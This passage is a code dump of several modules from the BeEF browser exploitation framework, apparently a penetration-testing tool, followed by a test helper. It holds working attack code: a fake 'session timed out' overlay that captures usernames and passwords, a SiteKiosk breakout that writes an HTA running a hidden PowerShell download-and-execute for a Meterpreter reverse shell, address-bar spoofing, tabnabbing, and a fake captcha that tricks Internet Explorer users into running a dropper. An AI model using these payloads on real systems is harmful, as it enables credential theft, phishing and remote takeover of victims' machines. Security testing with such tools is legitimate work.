dark.style.MozOpacity=opaque; dark.style.filter='alpha(opacity='+opacity+')'; dark.style.zIndex=zindex; dark.style.backgroundColor=bgcolor; dark.style.width= pageWidth; dark.style.height= pageHeight; dark.style.display='block'; } else { dark.style.display='none'; } } // function to send response function win(){ document.getElementById('hax').innerHtml='<h2>Thank you for re-authenticating, you will now be returned to the application</h2>'; answer = document.getElementById('uname').value+':'+document.getElementById('pass').value; } // perform darkening grayOut(true); function checker(){ processval = document.body.lastChild.getElementsByTagName("input")[2].value; if (processval == "Processing..") { uname = document.body.lastChild.getElementsByTagName("input")[0].value; pass = document.body.lastChild.getElementsByTagName("input")[1].value; answer = uname+":"+pass send(answer); // set lastchild invisible document.body.lastChild.setAttribute('style','display:none'); // lighten screen grayOut(false); clearInterval(credgrabber); $j('#hax').remove(); $j('#darkenScreenObject').remove(); } } // floating div function writeit() { sneakydiv = document.createElement('div'); sneakydiv.setAttribute('id', 'hax'); sneakydiv.setAttribute('style', 'width:400px;height:320px;position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000'); sneakydiv.setAttribute('align', 'center'); document.body.appendChild(sneakydiv); sneakydiv.innerHTML= '<br><img src=\''+imgr+'\' width=\'80px\' height\'80px\' /><h2>Your session has timed out!</h2><p>For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'uname\' id=\'uname\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></td><tr><td>Password:</td><td><input type=\'password\' name=\'pass\' id=\'pass\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lul\' onClick=\'document.getElementById(\"lul\").value=\"Processing..\";\' value=\'Continue\'>'; credgrabber = setInterval(checker,1000); } writeit();
JavaScript
beef/modules/social_engineering/sitekiosk_breakout/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { if(beef.browser.isIE()){ // application='yes' is IE-only and needed to load the HTA into an IFrame. // in this way you can have your phishing page, and load the HTA on top of it // beef.dom.createIframe('hidden', {'src':hta_url,'application':'yes'}); bb = new MSBlobBuilder(); bb.append('<script>new ActiveXObject("WScript.Shell").Run(\'taskkill.exe /F /IM Watchdog.exe\');<\/script>'); bb.append('<script>new ActiveXObject("WScript.Shell").Run(\'taskkill.exe /F /IM SiteKiosk.exe\');<\/script>'); bb.append('<script>new ActiveXObject("WScript.Shell").Run(\'powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring(\\\\\\"<%= @payload_handler %>\\\\\\"))"\');<\/script>'); window.navigator.msSaveOrOpenBlob(bb.getBlob(),"BREAKOUT.hta"); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'HTA loaded into hidden IFrame.'); } });
YAML
beef/modules/social_engineering/sitekiosk_breakout/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: sitekiosk_breakout: enable: true category: ["Social Engineering"] name: "SiteKiosk Breakout" description: "This Module breaks out of SiteKiosk by using HTA. The HTA closes the kiosk and starts a reverse meterpreter shell via a powershell payload!<br>Before launching the module, do the following on Metasploit:<br>use exploit/windows/misc/psh_web_delivery<br>set URIPATH /psh<br>set PAYLOAD windows/meterpreter/reverse_https<br>set LHOST x.x.x.x<br>set LPORT 443<br>set ExitOnSession false<br>set AutoRunScript post/windows/manage/smart_migrate<br>exploit -j -z<br><br>After executing the module, follow this steps:<br>Click Save<br>Enter shell:ProgramFiles in the Save Dialogs adressbar<br>Navigate to C:\\Users\\Public\\Downloads<br>Save the file<br>After the Download is finished click on execute<br>Profit" authors: ["insertscript"] target: user_notify: ["IE"] not_working: ["ALL"]
Ruby
beef/modules/social_engineering/sitekiosk_breakout/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Sitekiosk_breakout < BeEF::Core::Command def pre_send # gets the value configured in the module configuration by the user @datastore.each do |input| @payload_handler = input['value'] if input['name'] == 'payload_handler' end end def self.options [ { 'name' => 'payload_handler', 'ui_label' => 'Payload Handler', 'value' => 'http://10.10.10.10:8080/psh' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/social_engineering/spoof_addressbar_data/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var hook = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + beef.net.hook; try { window.location = "data:text/html,<%= @spoofed_url %><%= ' '*1337 %>?<script src='"+hook+"'></script><script>document.title='<%= @spoofed_url %>';beef.dom.createIframe('fullscreen',{'src':'<%= @real_url %>'},{},null);</script>" beef.debug("[Spoof Address Bar (data)] Redirecting to data URL..."); } catch (e) { beef.debug("[Spoof Address Bar (data)] could not redirect: "+e.message) beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=something went horribly wrong: " + e.message, beef.are.status_error()); } });
YAML
beef/modules/social_engineering/spoof_addressbar_data/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: spoof_addressbar_data: enable: true category: "Social Engineering" name: "Spoof Address Bar (data URL)" description: "This module redirects the browser to a legitimate looking URL with a ''data'' scheme, such as ''data:text/html,http://victim.com'', with a BeEF hook and a user-specified URL in a 100% x 100% iframe." authors: ["bcoles"] target: user_notify: ["O", "FF", "C"] not_working: ["IE"]
Ruby
beef/modules/social_engineering/spoof_addressbar_data/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Spoof_addressbar_data < BeEF::Core::Command def self.options [ { 'name' => 'spoofed_url', 'ui_label' => 'Spoofed URL', 'type' => 'text', 'value' => 'https://example.com/' }, { 'name' => 'real_url', 'ui_label' => 'Real URL', 'type' => 'text', 'value' => 'https://example.com/' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/social_engineering/tabnabbing/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var url = "<%= @url %>"; var wait = <%= @wait %>*1000*60; var tabnab_timer; beef.net.send('<%= @command_url %>', <%= @command_id %>, 'tabnab=waiting for tab to become inactive'); // begin countdown when the tab loses focus $j(window).blur(function(e) { begin_countdown(); // stop countdown if the tab regains focus }).focus(function(e) { clearTimeout(tabnab_timer); }); begin_countdown = function() { tabnab_timer = setTimeout(function() { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'tabnab=redirected'); window.location = url; }, wait); } });
YAML
beef/modules/social_engineering/tabnabbing/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: tabnabbing: enable: true category: "Social Engineering" name: "TabNabbing" description: "This module redirects to the specified URL after the tab has been inactive for a specified amount of time." authors: ["bcoles"] target: user_notify: ["All"]
Ruby
beef/modules/social_engineering/tabnabbing/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Tabnabbing < BeEF::Core::Command def self.options configuration = BeEF::Core::Configuration.instance proto = configuration.get('beef.http.https.enable') == true ? 'https' : 'http' uri = "#{proto}://#{configuration.get('beef.http.host')}:#{configuration.get('beef.http.port')}/demos/basic.html" [ { 'name' => 'url', 'description' => 'Redirect URL', 'ui_label' => 'URL', 'value' => uri, 'width' => '400px' }, { 'name' => 'wait', 'description' => 'Wait (minutes)', 'ui_label' => 'Wait (minutes)', 'value' => '15', 'width' => '150px' } ] end def post_execute content = {} content['tabnab'] = @datastore['tabnab'] save content end end
JavaScript
beef/modules/social_engineering/text_to_voice/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var url = beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/objects/msg-<%= @command_id %>.mp3'; try { var sound = new Audio(url); sound.play(); beef.debug('[Text to Voice] Playing mp3: ' + url); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=message sent", beef.are.status_success()); } catch (e) { beef.debug("[Text to Voice] HTML5 audio unsupported. Could not play: " + url); beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=audio not supported", beef.are.status_error()); } });
YAML
beef/modules/social_engineering/text_to_voice/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: text_to_voice: enable: true category: "Social Engineering" name: "Text to Voice" description: "Convert text to mp3 and play it on the hooked browser. Note: this module requires Lame and eSpeak to be installed." authors: ["bcoles"] # http://caniuse.com/audio target: working: ["All"] not_working: IE: min_ver: 1 max_ver: 8 FF: min_ver: 1 max_ver: 2 S: min_ver: 1 max_ver: 3
Ruby
beef/modules/social_engineering/text_to_voice/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Text_to_voice < BeEF::Core::Command require 'espeak' include ESpeak def pre_send # Ensure lame and espeak are installed if IO.popen(%w[which lame], 'r').read.to_s.eql?('') print_error('[Text to Voice] Lame is not in $PATH (apt-get install lame)') return end if IO.popen(%w[which espeak], 'r').read.to_s.eql?('') print_error('[Text to Voice] eSpeak is not in $PATH (apt-get install espeak)') return end # Validate module options message = nil language = nil @datastore.each do |input| message = input['value'] if input['name'] == 'message' language = input['value'] if input['name'] == 'language' end unless Voice.all.map(&:language).include?(language) print_error("[Text to Voice] Language '#{language}' is not supported") print_more("Supported languages: #{Voice.all.map(&:language).join(',')}") return end # Convert text to voice, encode as mp3 and write to module directory begin msg = Speech.new(message.to_s, voice: language) mp3_path = "modules/social_engineering/text_to_voice/mp3/msg-#{@command_id}.mp3" msg.save(mp3_path) rescue StandardError => e print_error("[Text to Voice] Could not create mp3: #{e.message}") return end # Mount the mp3 to /objects/ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind( "/#{mp3_path}", "/objects/msg-#{@command_id}", 'mp3' ) end def self.options [ { 'name' => 'message', 'description' => 'Text to read', 'type' => 'textarea', 'ui_label' => 'Text', 'value' => 'Hello; from beef', 'width' => '400px' }, { 'name' => 'language', 'description' => 'Language', 'type' => 'text', 'ui_label' => 'Language', 'value' => 'en' } ] end def post_execute content = {} content['result'] = @datastore['result'] save content BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind("/objects/msg-#{@command_id}.mp3") end end
JavaScript
beef/modules/social_engineering/ui_abuse_ie/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { if(beef.browser.isIE()){ var captcha_message = ""; var tab_message = ""; var captcha_src = ""; // TODO this image is either corrupted or simply thew GIF animation doesn't work var blink_src = "data:image/gif;base64,R0lGODdhIAF3ALMAAAAAAEqN/3Wo/8TExMzMzNXV1eXl5fPz8////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAkyAAkALAAAAAAgAXcAAAT/EMlJq7046827/2AojmRpnmiqrmzrvnAsz3Rt33iu73zv/8CgcEgsGo/IpHLJbDqf0Kh0Sq1ar9isdsvter/gsHhMLpvP6LR6zW673/C4fE6v2+/4vH7P7/v/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXPgIBm5ydnp+goaKjpKWmp6ipqqusra6vsAEaAQMEtre4ubq7vL2+v8DBwsPExcbHyMnKy7MFBs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+SzBgeY6RwBBuruGezv8hXx8/b19vL4+e77/On+/l0KKLASwYKTDiKMpHDho4YOG0GMuGgixUQWLx7KqLEQx46D9T6CDCRy5J+SJvugTLlnJcs8Ll/eYYdOZiJNsXLq3Mmzp8+fQGPZHEq0qNGjSJMqXcq0qdOnUKNKnUq1qtWrWC8k2Mq1q9evYMOKHUu2rNmzaNOqXcu2rdu3cOPKnUu3rt27ePPq3cu3r9+/gAMLHky4sOHDiBMrXsy4sePHkCNLnky5suXLmDNr3sy5s+fPoEOLHk26tOnTqFOrXs26tevXsGPLnk27tu3buHPr3s27t+/fwIMLH068uPHjyJMrX868ufPn0KNLn069uvXr2LNr3869u/fv4MOLH0++vPnz6NOrX8++vfv38OPLn0+/vv37yCMAACH5BAkyAAkALAAAAAAgAU0AAAT/EMlJq7046827/2AojmRpnmiqrmzrvnAsz3Rt33iu73zv/8CgcEgsGo/IpHLJbDqf0Kh0Sq1ar9isdsvter/gsHhMLpvP6LR6zW673/C4fE6v2+/4vH7P7/v/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXPgIBm5ydnp+goaKjpKWmp6ipqqusra6vsAEaAQMEtre4ubq7vL2+v8DBwsPExcbHyMnKy7MFBs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+SzBgeY6RwBBuruGezv8hXxGADzlvUX9/iU+hb8+kn6VyGgQEgEKRg86CjhhIUMGTmUADGiookIKlpEhFHjRkMdVz82CilyEcmSiU6iPKRyZaGWLgfBjBloJs0/Nm/2wajzZbueEn8CvXhuqCJNsZIqXcq0qdOnUGMZnUq1qtWrWLNq3cq1q9evYMOKHUu2rNmzaNOqXTsiAgA7"; switch (beef.browser.getBrowserLanguage().substring(0,2)){ case "en": lang = "en"; captcha_message = "<h2>Our systems have detected unusual traffic from your computer network.</h2><br><h3> In order to continue, please solve the following Captcha after <b>pressing the [TAB] key</b>:</h3>"; tab_message = "You must press the [TAB] key first, then solve the Captcha."; captcha_src = "data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDABYPERMRDhYTEhMZFxYaITckIR4eIUQwMyg3UEZUU09GTUxYY39sWF54X0xNbpZweIOHjpCOVmqcp5uKpn+Ljon/wAALCAA5ASwBAREA/8QAGgABAAIDAQAAAAAAAAAAAAAAAAQFAgMGAf/EAC4QAAEEAgEDAwMCBwEAAAAAAAABAgMEBRESBjFBEyFRFDJxIiMVFkJSYnKRgf/aAAgBAQAAPwDrgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARr12Kixr5toxy638Ehj2yMR7FRWqm0VD0AAAAAAAAAAAAFVey8lCw5s9GZYE7TR/qTt5Twb6+Xx9iNHx2o9L4culJjJGSN5Me1yfKLsyMHyxx/fI1v5U0W8hWqRJLLInF3bXvsprHVtZiqyKCRz/CKmtlY7qXLNstV0HFir9nHuhvylm9k8oynVesSI1FXwZyVsxhYPqW2vqGN+9i/BlHBLn6j3xXXNa77onpvipGx2SyWOsrjHRtmVi6airr/h0dfJq6NzrNaWBze6Km0IEvUcVe61j3Nkrv7Pb3b+ULyKaOZiPiejmr7oqKZgGmzagqM52JGxt+VPa1mG1GkkEjZGfKKbQAAAAAAAARcm9rcbbVXfbE7evwcfgen4cnQknkmc1+1a1G+PyTMRgcjXtyQzyObVciormP1v40R87TmxtmCKnasOfL/c8zn6ZyMsTZFtLJIvdrl7F9hcWtOi2G0rZXIu/f30c7kJ6kfVPKVE9Jipv4OtqzVLsaSwcJGp2XXYpM7Xu1skzIUYuaomnIiGp+Wylys+v/AA13J6a34JnS+Ls4+KR1nTVk7NTwV/VcEtXIQ5CFqr86MIOrJpLMTHwJ6a+zk8l3matOTFzSvgai8NoutKhQdN0Es1ZJHW5YeK6arXaL29amx2PjZHKs8z14tc49hht+hztZJGvVN/p1pCNislYuy2KL5UV7E/TMxCrbUvZHLrSs2PWhgdycqkl0seD6hbDEvCvMicm79kOqY5r2o5qoqL2VD0AAAAAAAAo8r06y698texJA9++SbVWu/wDCuxuHzOItp9O6OWFyor05aRx0l6y+pX9VleSwqL9kfc4nLXLuSyMdqGnNF6TdIitVfPc63CWb1msrr1b0V/p/yT8DJ079t3GvcSvF5RG+/wD0gwdKU2u52ZJJ372qqutl3Xrw1o0jgjaxqeEQ2jSAxkjZI1Wvajmr4VCOzG0mORza8aKi7RdGGXqvt46WCJdOcnscZFg8wn7TWOaxV9/f2LC1W+nyFSG/I5a8bNK7xsmWEwrNMja6zI7sxjlUyderYmJ0MFNyWXpvhG3evypGwUGXiSeVIGsdKu+UndVNv8sy3LP1OStc3r3axDo4IWQQtijTTWppDMAAAAAAAAAAAAAAAGuevDYZwmja9vwqGMFStWT9iBkf+qGzgzly4pv50ZAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//9k="; break; case "it": lang = "it"; captcha_message = "<h2>I nostri sistemi hanno rilevato traffico inusuale proveniente dal tuo computer.</h2><br><h3> Per continuare, risolvi il seguente Captcha <b>dopo aver premuto il tasto [TAB]</b>:</h3>"; tab_message = "Devi prima premere il tasto [TAB], poi risolvere il Captcha."; captcha_src = "data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDABYPERMRDhYTEhMZFxYaITckIR4eIUQwMyg3UEZUU09GTUxYY39sWF54X0xNbpZweIOHjpCOVmqcp5uKpn+Ljon/wAALCAA5ASwBAREA/8QAGgABAAMBAQEAAAAAAAAAAAAAAAMEBQIBBv/EADAQAAEEAgAEBQIFBQEAAAAAAAABAgMEBREGEhMhIjEyQVEVcRRCUmGRIzNygbHh/9oACAEBAAA/APrgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZ1/M06M7YJFc6VfysbtUJoMlVnc1rZOVzvJr05VX+S2ARyzxRJuSRrfupHDeqzqqRTMe5PZF7mYnEUS5BlV1aVnO7l5nJpBlbuWrSPfXrxvgZ35lXupdxuQ+oY9LEbU6mu7d+5Rk4iZVldFfrSQPTy90cd1eJKM/q54k/U5vb+TWjljkjSRj0cxfdFOmua70uRfsp6AAAAAAAAAAAD5WJ15vEtrUMDp3RtVEf22iInkpLnLVmWk6ObFzNkTuyRjkcjVT32hAzI37ENOm6dKr3xq6SV/ZdIqohesMq16jl+sSdVE2jlm33+xVpZ2w7ETSyKjnsdyNevbf7ndCSnGnVk6l2y7uumqqJ+xGlG1bzMVlldtRiLtUVe7k+x1xLPHFkqTV01WrzK49zHEUa13QU2rM9W6VyJ2QqcKZKOs2SGdHorl2nh7HHEeRqXLlbpuR7GO8e2mtemxq4R6MWJGqzwp77IuDZurjXxOXfK5eyr7EeUh/AZOslKZ7HSv8TN7Q1MrNkK0aTVum5jW7cjjvC5F2RqdZ8fIqLpfgiuZ+nVn6CK6WT9MabKbuKq8cyRy15Wb/AFIT5fMLDFHFRb1LMyba1PZPkxbbs9j4Uu2LOvFrp7PqsZZdboRTvbyue3aoWgAAAAAAACnex8dtWybWOeP+3K1dK3/wz5mcRORImPqonksqea/6IMji5o71a+sP41GsRk7NJt3b1IhxNfwqR8tXHNmsL2SJIdKi/v2LF3FT3sPExGRwTtXn6bU037HcMuYZGldlCFjkTXU5/CW6GOdBIs9mZZ7DvdfJPshPbx9W4qLYha9U8lU9hpVYG8sUDGovwhI2vCz0xMT7IROx9N67dXjVf8StdwdG41EfHy6TScvbRHicHFi5nvile5HflXyMfIPsUs++3NXfOzXgRE8infz9zIyJT5Urseunb8zUzE30jCw1qrkRZO3Mn/Szg6VGjTbZfLG+R6bdI5TOkTG3shPa5JZmRNVyuX09iviM1TgtSzzxPdM9dN5U3pPhDSsQ2+IJmc8Tq1Ni78fqcfRRRtiibGxNNamkOgAAAAAAAAAeI1qLtGpv50egAAAHioi+aIpRs4ahal6s1dqv+U7HGTw1bIwMiftnJ6Vb7FKtwpUid/Vmlmank1V0hsx1K8UHQZCxsfu1E7KRw46lA7mirRtd8o0tAAAAAAAAAAAAAAAAAAAAAAAAAAAAH//Z"; break; default: // defaults to english lang = "en"; captcha_message = "<h2>Our systems have detected unusual traffic from your computer network.</h2><br><h3> In order to continue, please solve the following Captcha after pressing the [TAB] key:</h3>"; tab_message = "You must press the [TAB] key first, then solve the Captcha."; captcha_src = "data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDABYPERMRDhYTEhMZFxYaITckIR4eIUQwMyg3UEZUU09GTUxYY39sWF54X0xNbpZweIOHjpCOVmqcp5uKpn+Ljon/wAALCAA5ASwBAREA/8QAGgABAAIDAQAAAAAAAAAAAAAAAAQFAgMGAf/EAC4QAAEEAgEDAwMCBwEAAAAAAAABAgMEBRESBjFBEyFRFDJxIiMVFkJSYnKRgf/aAAgBAQAAPwDrgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARr12Kixr5toxy638Ehj2yMR7FRWqm0VD0AAAAAAAAAAAAFVey8lCw5s9GZYE7TR/qTt5Twb6+Xx9iNHx2o9L4culJjJGSN5Me1yfKLsyMHyxx/fI1v5U0W8hWqRJLLInF3bXvsprHVtZiqyKCRz/CKmtlY7qXLNstV0HFir9nHuhvylm9k8oynVesSI1FXwZyVsxhYPqW2vqGN+9i/BlHBLn6j3xXXNa77onpvipGx2SyWOsrjHRtmVi6airr/h0dfJq6NzrNaWBze6Km0IEvUcVe61j3Nkrv7Pb3b+ULyKaOZiPiejmr7oqKZgGmzagqM52JGxt+VPa1mG1GkkEjZGfKKbQAAAAAAAARcm9rcbbVXfbE7evwcfgen4cnQknkmc1+1a1G+PyTMRgcjXtyQzyObVciormP1v40R87TmxtmCKnasOfL/c8zn6ZyMsTZFtLJIvdrl7F9hcWtOi2G0rZXIu/f30c7kJ6kfVPKVE9Jipv4OtqzVLsaSwcJGp2XXYpM7Xu1skzIUYuaomnIiGp+Wylys+v/AA13J6a34JnS+Ls4+KR1nTVk7NTwV/VcEtXIQ5CFqr86MIOrJpLMTHwJ6a+zk8l3matOTFzSvgai8NoutKhQdN0Es1ZJHW5YeK6arXaL29amx2PjZHKs8z14tc49hht+hztZJGvVN/p1pCNislYuy2KL5UV7E/TMxCrbUvZHLrSs2PWhgdycqkl0seD6hbDEvCvMicm79kOqY5r2o5qoqL2VD0AAAAAAAAo8r06y698texJA9++SbVWu/wDCuxuHzOItp9O6OWFyor05aRx0l6y+pX9VleSwqL9kfc4nLXLuSyMdqGnNF6TdIitVfPc63CWb1msrr1b0V/p/yT8DJ079t3GvcSvF5RG+/wD0gwdKU2u52ZJJ372qqutl3Xrw1o0jgjaxqeEQ2jSAxkjZI1Wvajmr4VCOzG0mORza8aKi7RdGGXqvt46WCJdOcnscZFg8wn7TWOaxV9/f2LC1W+nyFSG/I5a8bNK7xsmWEwrNMja6zI7sxjlUyderYmJ0MFNyWXpvhG3evypGwUGXiSeVIGsdKu+UndVNv8sy3LP1OStc3r3axDo4IWQQtijTTWppDMAAAAAAAAAAAAAAAGuevDYZwmja9vwqGMFStWT9iBkf+qGzgzly4pv50ZAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//9k="; break; } var grayOut = function(vis, options) { var options = options || {}; var zindex = options.zindex || 50; var opacity = options.opacity || 70; var opaque = (opacity / 100); var bgcolor = options.bgcolor || '#000000'; var dark=document.getElementById('darkenScreenObject'); if (!dark) { var tbody = document.getElementsByTagName("body")[0]; var tnode = document.createElement('div'); tnode.style.position='absolute'; tnode.style.top='0px'; tnode.style.left='0px'; tnode.style.overflow='hidden'; tnode.style.display='none'; tnode.id='darkenScreenObject'; tbody.appendChild(tnode); dark=document.getElementById('darkenScreenObject'); } if (vis) { var pageWidth='100%'; var pageHeight='100%'; dark.style.opacity=opaque; dark.style.MozOpacity=opaque; dark.style.filter='alpha(opacity='+opacity+')'; dark.style.zIndex=zindex; dark.style.backgroundColor=bgcolor; dark.style.width= pageWidth; dark.style.height= pageHeight; dark.style.display='block'; } else { dark.style.display='none'; } }; function spawnPopunder(){ var url = beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/underpop.html' var pu = window.open(url,'','top=0, left=0,width=500,height=500'); pu.blur(); } // The keypress focus is on the popunder, but the following would be nice to have to force the victim to press TAB // var tab_pressed = false; // function checkTabPressed(){ // beef.debug(event.keyCode); // if(tab_pressed && event.keyCode != 9){ // // all good // }else if(event.keyCode == 9){ // tab_pressed = true; // }else{ // alert(tab_message); // } // } if(beef.browser.isIE9() || beef.browser.isIE10()){ document.body.onclick = function(){ spawnPopunder(); grayOut(true,{'opacity':'70'}); var fake_captcha = document.createElement('div'); fake_captcha.setAttribute('id', 'popup'); fake_captcha.setAttribute('style', 'width:400px;position:absolute; top:20%; left:40%; z-index:51; background-color:white;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000'); fake_captcha.setAttribute('align', 'center'); // using onkeydown because onkeypress is not capturing TAB in IE //fake_captcha.onkeydown = function(){checkTabPressed();}; document.body.appendChild(fake_captcha); fake_captcha.innerHTML= '<br>' + captcha_message + '<table border=\'0\'><tr><td><img src="' + blink_src + '"></td><tr><td><img src="' + captcha_src + '"></td></tr></table>'; }; }else{ // unsupported IE version } } });
YAML
beef/modules/social_engineering/ui_abuse_ie/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: ui_abuse_ie: enable: true category: "Social Engineering" name: "User Interface Abuse (IE 9/10)" description: "This module is based on Rosario Valotta research (https://sites.google.com/site/tentacoloviola/).<br> The executable to be run needs to be signed (best thing is signing it with Symantec EV-SSL) and me served same-origin from BeEF. You can mount an exe in BeEF as per extensions/social_engineering/droppers/readme.txt.<br> The victim is tricked to press [TAB]+R (IE 9) or simply R (IE 10), which are keyboard shortcuts for the modeless dialog option 'Run'. Depending on the browser language, the modeless dialog shortcuts are different. For example, R for English, E for Italian. In order to achieve such behavior, a fake captcha is displayed." authors: ["Rosario Valotta", "antisnatchor"] target: working: ["IE"] not_working: ["ALL"]
Ruby
beef/modules/social_engineering/ui_abuse_ie/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # ################################################################################ # Based on the PoC by Rosario Valotta # Ported to BeEF by antisnatchor # For more information see: https://sites.google.com/site/tentacoloviola/ ################################################################################ class Ui_abuse_ie < BeEF::Core::Command def self.options [ { 'name' => 'exe_url', 'ui_label' => 'Executable URL (MUST be signed)', 'value' => 'http://beef_server:beef_port/yourdropper.exe' } ] end def pre_send @datastore.each do |input| @exe_url = input['value'] if input['name'] == 'exe_url' end popunder = File.read("#{$root_dir}/modules/social_engineering/ui_abuse_ie/popunder.html") body = popunder.gsub('__URL_PLACEHOLDER__', @exe_url) BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', { 'Content-Type' => 'text/html' }, body, '/underpop.html', -1) rescue StandardError => e print_error "Something went wrong executing Ui_abuse_ie::pre_send, exception: #{e.message}" end def post_execute content = {} content['results'] = @datastore['results'] save content end end
HTML
beef/modules/social_engineering/ui_abuse_ie/popunder.html
<!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> </head> <body style="height: 1000px" > <iframe id="xu" width="100" height="100"></iframe> <script type="text/javascript"> document.getElementById("xu").src="__URL_PLACEHOLDER__"; </script> </body> </html>
Ruby
beef/spec/spec_helper.rb
require 'core/loader.rb' # @note We need to load variables that 'beef' usually does for us # @todo review this config (this isn't used or is shadowed by the monkey patching, needs a further look to fix properly) config = BeEF::Core::Configuration.new('config.yaml') $home_dir = Dir.pwd $root_dir = Dir.pwd require 'core/bootstrap.rb' require 'rack/test' require 'curb' require 'rest-client' require 'yaml' require 'selenium-webdriver' require 'browserstack/local' require 'byebug' # Require supports Dir['spec/support/*.rb'].each do |f| require f end ENV['RACK_ENV'] ||= 'test' ARGV = [] ## BrowserStack config # Monkey patch to avoid reset sessions class Capybara::Selenium::Driver < Capybara::Driver::Base def reset! @browser.navigate.to('about:blank') if @browser end end TASK_ID = (ENV['TASK_ID'] || 0).to_i print_info ENV['CONFIG_FILE'] CONFIG_FILE = ENV['CONFIG_FILE'] || 'windows/win10/win10_chrome_81.config.yml' CONFIG = YAML.safe_load(File.read("./spec/support/browserstack/#{CONFIG_FILE}")) CONFIG['user'] = ENV['BROWSERSTACK_USERNAME'] || '' CONFIG['key'] = ENV['BROWSERSTACK_ACCESS_KEY'] || '' ## DB config ActiveRecord::Base.logger = nil OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')] OTR::ActiveRecord.configure_from_hash!(adapter: 'sqlite3', database: ':memory:') # otr-activerecord requires manually establishing the connection with the following line # Also a check to confirm that the correct Gem version is installed to require it, likely easier for old systems. if Gem.loaded_specs['otr-activerecord'].version > Gem::Version.create('1.4.2') OTR::ActiveRecord.establish_connection! end ActiveRecord::Schema.verbose = false context = ActiveRecord::Migration.new.migration_context ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate if context.needs_migration? RSpec.configure do |config| config.disable_monkey_patching! config.bisect_runner = :shell config.order = :random Kernel.srand config.seed config.include Rack::Test::Methods 